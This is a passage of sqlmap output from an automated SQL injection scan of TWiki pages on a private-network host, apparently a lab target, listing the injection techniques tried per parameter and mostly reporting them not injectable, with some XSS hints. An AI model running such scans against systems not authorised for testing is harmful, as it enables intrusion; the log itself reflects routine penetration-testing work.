[19:54:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:54:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:54:27] [WARNING] GET parameter 't' is not injectable
[19:54:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 144:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Starting *Points[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:54:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Starting *Points[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:54:27] [INFO] testing connection to the target URL
[19:54:27] [INFO] testing if the target URL is stable
[19:54:28] [INFO] target URL is stable
[19:54:28] [INFO] testing if URI parameter '#1*' is dynamic
[19:54:28] [INFO] confirming that URI parameter '#1*' is dynamic
[19:54:28] [INFO] URI parameter '#1*' is dynamic
[19:54:28] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:54:28] [INFO] testing for SQL injection on URI parameter '#1*'
[19:54:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:54:28] [WARNING] reflective value(s) found and filtering out
[19:54:30] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:54:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:54:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:54:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:54:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:54:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:54:30] [INFO] testing 'MySQL inline queries'
[19:54:30] [INFO] testing 'PostgreSQL inline queries'
[19:54:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:54:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:54:30] [WARNING] time-based comparison requires larger statistical model, please wait.....
[19:54:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:54:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:54:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:54:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:54:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:54:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:54:31] [INFO] testing 'Oracle AND time-based blind'
[19:54:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:54:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:54:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:54:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:54:35] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:54:35] [WARNING] false positive or unexploitable injection point detected
[19:54:35] [WARNING] URI parameter '#1*' is not injectable
[19:54:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 145:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:54:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?skin=print'
[19:54:35] [INFO] testing connection to the target URL
[19:54:35] [INFO] testing if the target URL is stable
[19:54:36] [INFO] target URL is stable
[19:54:36] [INFO] testing if GET parameter 'skin' is dynamic
[19:54:36] [INFO] confirming that GET parameter 'skin' is dynamic
[19:54:36] [INFO] GET parameter 'skin' is dynamic
[19:54:36] [INFO] heuristics detected web page charset 'ascii'
[19:54:36] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:54:37] [INFO] testing for SQL injection on GET parameter 'skin'
[19:54:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:54:37] [WARNING] reflective value(s) found and filtering out
[19:54:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:54:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:54:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:54:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:54:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:54:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:54:40] [INFO] testing 'MySQL inline queries'
[19:54:40] [INFO] testing 'PostgreSQL inline queries'
[19:54:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:54:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:54:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:54:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:54:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:54:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:54:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:54:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:54:43] [INFO] testing 'Oracle AND time-based blind'
[19:54:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:54:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:54:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:54:54] [WARNING] GET parameter 'skin' is not injectable
[19:54:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 146:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/StartingPoints?rev1=1.4&rev2=1.3
do you want to test this URL? [Y/n/q]
> Y
[19:54:54] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/StartingPoints?rev1=1.4&rev2=1.3'
[19:54:54] [INFO] testing connection to the target URL
[19:54:55] [INFO] testing if the target URL is stable
[19:54:56] [INFO] target URL is stable
[19:54:56] [INFO] testing if GET parameter 'rev1' is dynamic
[19:54:56] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:54:56] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:54:56] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[19:54:56] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:54:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:54:56] [WARNING] reflective value(s) found and filtering out
[19:54:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:54:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:54:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:54:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:54:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:55:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:55:00] [INFO] testing 'MySQL inline queries'
[19:55:00] [INFO] testing 'PostgreSQL inline queries'
[19:55:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:55:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:55:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:55:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:55:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:55:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:55:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:55:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:55:03] [INFO] testing 'Oracle AND time-based blind'
[19:55:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:55:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:55:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:55:16] [WARNING] GET parameter 'rev1' is not injectable
[19:55:16] [INFO] testing if GET parameter 'rev2' is dynamic
[19:55:16] [INFO] confirming that GET parameter 'rev2' is dynamic
[19:55:16] [INFO] GET parameter 'rev2' is dynamic
[19:55:16] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:55:16] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[19:55:16] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:55:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:55:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:55:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:55:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:55:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:55:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:55:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:55:20] [INFO] testing 'MySQL inline queries'
[19:55:20] [INFO] testing 'PostgreSQL inline queries'
[19:55:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:55:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:55:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:55:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:55:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:55:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:55:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:55:24] [INFO] testing 'Oracle AND time-based blind'
[19:55:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:55:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:55:38] [WARNING] GET parameter 'rev2' is not injectable
[19:55:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 147:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?rev=1.3
do you want to test this URL? [Y/n/q]
> Y
[19:55:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?rev=1.3'
[19:55:38] [INFO] testing connection to the target URL
[19:55:38] [INFO] testing if the target URL is stable
[19:55:39] [INFO] target URL is stable
[19:55:39] [INFO] testing if GET parameter 'rev' is dynamic
[19:55:39] [WARNING] GET parameter 'rev' does not appear dynamic
[19:55:39] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:55:39] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:55:39] [INFO] testing for SQL injection on GET parameter 'rev'
[19:55:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:55:39] [WARNING] reflective value(s) found and filtering out
[19:55:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:55:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:55:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:55:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:55:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:55:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:55:43] [INFO] testing 'MySQL inline queries'
[19:55:43] [INFO] testing 'PostgreSQL inline queries'
[19:55:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:55:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:55:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:55:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:55:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:55:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:55:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:55:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:55:46] [INFO] testing 'Oracle AND time-based blind'
[19:55:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:55:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:55:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:55:59] [WARNING] GET parameter 'rev' is not injectable
[19:55:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:55:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/StartingPoints?rev1=1.3&rev2=1.2'
[19:55:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?rev=1.2'
URL 148:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/StartingPoints?template=oopsmore&param1=1.4&param2=1.4
do you want to test this URL? [Y/n/q]
> Y
[19:55:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/StartingPoints?template=oopsmore&param1=1.4&param2=1.4'
[19:55:59] [INFO] testing connection to the target URL
[19:55:59] [INFO] testing if the target URL is stable
[19:56:00] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:56:00] [INFO] testing if GET parameter 'template' is dynamic
[19:56:00] [INFO] confirming that GET parameter 'template' is dynamic
[19:56:00] [INFO] GET parameter 'template' is dynamic
[19:56:00] [INFO] heuristics detected web page charset 'ascii'
[19:56:00] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:56:00] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:56:00] [INFO] testing for SQL injection on GET parameter 'template'
[19:56:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:56:01] [WARNING] reflective value(s) found and filtering out
[19:56:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:56:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:56:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:56:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:56:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:56:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:56:03] [INFO] testing 'MySQL inline queries'
[19:56:03] [INFO] testing 'PostgreSQL inline queries'
[19:56:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:56:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:56:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:56:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:56:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:56:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:56:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:56:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:56:06] [INFO] testing 'Oracle AND time-based blind'
[19:56:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:56:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:56:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:56:16] [WARNING] GET parameter 'template' is not injectable
[19:56:16] [INFO] testing if GET parameter 'param1' is dynamic
[19:56:16] [WARNING] GET parameter 'param1' does not appear dynamic
[19:56:16] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:56:16] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:56:16] [INFO] testing for SQL injection on GET parameter 'param1'
[19:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:56:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:56:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:56:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:56:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:56:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:56:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:56:21] [INFO] testing 'MySQL inline queries'
[19:56:21] [INFO] testing 'PostgreSQL inline queries'
[19:56:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:56:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:56:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:56:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:56:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:56:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:56:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:56:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:56:25] [INFO] testing 'Oracle AND time-based blind'
[19:56:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:56:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:56:40] [WARNING] GET parameter 'param1' is not injectable
[19:56:40] [INFO] testing if GET parameter 'param2' is dynamic
[19:56:40] [WARNING] GET parameter 'param2' does not appear dynamic
[19:56:40] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:56:40] [INFO] testing for SQL injection on GET parameter 'param2'
[19:56:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:56:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:56:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:56:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:56:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:56:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:56:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:56:45] [INFO] testing 'MySQL inline queries'
[19:56:45] [INFO] testing 'PostgreSQL inline queries'
[19:56:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:56:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:56:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:56:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:56:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:56:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:56:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:56:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:56:49] [INFO] testing 'Oracle AND time-based blind'
[19:56:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:56:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:57:04] [WARNING] GET parameter 'param2' is not injectable
[19:57:04] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:57:04] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/TWiki/NotExistingYet?topicparent=TWiki.TextFormattingRules'
URL 149:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingRules?t=1441457582
do you want to test this URL? [Y/n/q]
> Y
[19:57:04] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingRules?t=1441457582'
[19:57:04] [INFO] testing connection to the target URL
[19:57:05] [INFO] testing if the target URL is stable
[19:57:05] [INFO] target URL is stable
[19:57:05] [INFO] testing if GET parameter 't' is dynamic
[19:57:06] [WARNING] GET parameter 't' does not appear dynamic
[19:57:06] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:57:06] [INFO] testing for SQL injection on GET parameter 't'
[19:57:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:57:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:57:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:57:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:57:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:57:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:57:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:57:10] [INFO] testing 'MySQL inline queries'
[19:57:10] [INFO] testing 'PostgreSQL inline queries'
[19:57:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:57:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:57:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:57:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:57:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:57:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:57:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:57:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:57:14] [INFO] testing 'Oracle AND time-based blind'
[19:57:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:57:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:57:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:57:28] [WARNING] GET parameter 't' is not injectable
[19:57:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 150:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Text *Formatting *Rules[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:57:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Text *Formatting *Rules[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:57:28] [INFO] testing connection to the target URL
[19:57:28] [INFO] testing if the target URL is stable
[19:57:29] [INFO] target URL is stable
[19:57:29] [INFO] testing if URI parameter '#1*' is dynamic
[19:57:29] [INFO] confirming that URI parameter '#1*' is dynamic
[19:57:29] [INFO] URI parameter '#1*' is dynamic
[19:57:30] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:57:30] [INFO] testing for SQL injection on URI parameter '#1*'
[19:57:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:57:30] [WARNING] reflective value(s) found and filtering out
[19:57:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:57:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:57:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:57:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:57:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:57:34] [INFO] testing 'MySQL inline queries'
[19:57:34] [INFO] testing 'PostgreSQL inline queries'
[19:57:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:57:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:57:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:57:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:57:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:57:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:57:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:57:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:57:37] [INFO] testing 'Oracle AND time-based blind'
[19:57:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:57:38] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:57:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:57:49] [WARNING] URI parameter '#1*' is not injectable
[19:57:49] [INFO] testing if URI parameter '#2*' is dynamic
[19:57:49] [INFO] confirming that URI parameter '#2*' is dynamic
[19:57:49] [INFO] URI parameter '#2*' is dynamic
[19:57:49] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable
[19:57:49] [INFO] testing for SQL injection on URI parameter '#2*'
[19:57:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:57:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:57:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:57:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:57:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:57:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:57:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:57:53] [INFO] testing 'MySQL inline queries'
[19:57:53] [INFO] testing 'PostgreSQL inline queries'
[19:57:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:57:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:57:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:57:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:57:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:57:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:57:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
